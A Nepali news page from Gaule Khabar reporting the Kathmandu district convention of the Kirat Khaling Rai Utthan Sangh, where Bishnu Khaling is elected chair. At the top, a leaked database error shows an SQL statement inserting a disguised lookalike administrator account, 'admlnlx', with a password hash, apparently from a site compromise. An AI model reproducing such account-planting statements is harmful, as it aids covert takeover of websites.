WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BISXXGf3JNG.llb0nCoCvnR82BzwfL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:07:32', '', 'admlnlx', 'admlnlx')

किरात खालिङ राई उत्थान संघ काठमाडौ जिल्ला अध्यक्षमा बिष्णु खालिङ – Gaule Khabar

किरात खालिङ राई उत्थान संघ काठमाडौ जिल्ला अध्यक्षमा बिष्णु खालिङ

किरात खालिङ राई उत्थान संघ काठमाडौ जिल्ला अध्यक्षमा बिष्णु खालिङ

किरात खालिङ राई उत्थान सघ जिल्ला कार्यसमिती काठमाण्डौको दोस्रो जिल्ला सम्मेलनले बिष्णु खालिङको अध्यक्षतामा नया कार्यसमीति  चयन गरेको छ ।

सुकेधारा स्थित नवदुर्ग पार्टी भेनुमा आज (शनिवार) सम्पन्न जिल्ला सम्मेलनले उपाध्यक्षमा जङ्गबहादुर खालिङ, सचिबमा भुपाल खालिङ, सह-सचिबमा पशुपती खालिङ , कोषाध्यक्षमा किरण खालिङ, सह-कोषाध्यक्षमा टेकचन्द्र खालिङ चयन गरेको हो ।

किरात खालिङ राई उत्थान सघ केन्द्रीय अध्यक्ष सिताकुमारी खालिङको प्रमुख अतिथिमा सम्पन्न दोस्रो जिल्लासमेलनमा खालिङ समुदयबाट पहिलो संघिय संसद मानवीर खालिङ, माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण खालिङ, माप्य दुधकोशी गाउँपालिका उपाध्यक्ष गौरब खालिङलाई सम्मान पत्र द्वारा सम्मान गरिएको छ ।

कार्यक्रममा किरात खालिङ राई समूदयका बिशिट ब्यातिहरुको बाक्लो उपस्तिथी रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका